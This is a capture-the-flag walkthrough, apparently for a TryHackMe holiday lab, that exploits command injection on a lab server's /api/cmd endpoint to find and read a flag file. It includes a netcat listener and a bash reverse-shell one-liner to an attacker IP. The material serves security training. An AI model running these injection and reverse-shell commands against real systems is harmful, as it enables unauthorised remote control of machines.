“Another day, another hack from the Christmas Monster. Can you get back control of the system?
Access the web server on http://[your-ip]:3000/
McSkidy actually found something interesting on the /api/cmd endpoint.”
For this challenge you will have to deploy the VM from the question and then use either OpenVPN or the THM virtual Kali Machine (if you are a subscriber) to connect to it. If you need instructions for how to do that, click HERE.
Question #1 What are the contents of the user.txt file?
After reading through the source material, we can see that today’s question will be about command injection attacks.
Let’s start by opening up our attacking machine and navigating to the web address provided:
It says that McSkidy found something at the /api/cmd endpoint. Let’s head there:
Hmm, looks like it just returns an error message. That’s OK, we can still use this to input a basic command and see if that works.
I just passed the ls command here, and look, it shows us details of the file system, which means that this endpoint is definitely vulnerable to command injection attacks.
I would also like to try whoami:
This returns the fact that we are root. Not good, McSkidy…
We will need to find a way to look through the file system and grab the “user.txt” file.
The command I am going to use is:
find -name "user.txt"
However, you need to encode it in a way that is URL friendly (URLs don’t handle spaces and quotes well). I like this simple tool HERE.
After you encode it, it will look like this:
This is what we will paste into the browser navigation bar:
Hit enter, and you should see something like this:
So we found the path to the file. Now we just need to open it. Let’s encode another basic command:
This will reveal our flag!
You could have also created a reverse shell here to control in your own terminal. If you prefer that or just want to know an alternative method, keep reading.
I found THIS tool to make it much simpler. Though they also gave you a link to another cheat sheet from Pentestmonkey in the source material.
First, set up a port to listen on:
nc -lvnp 4444
-l for listen, -v for verbose, -n means not to resolve hostnames via DNS, -p for the port we want to listen on.
Now, we generate our reverse shell.
bash -i >& /dev/tcp/<attacker ip>/4444 0>&1
We input that in the browser navigation bar like we were doing earlier. Remember to encode it!
If you head back to your terminal you will see that you now have control of a reverse shell:
You can enter in the same commands as last time to get the flag once again:
Happy Hacking! ❤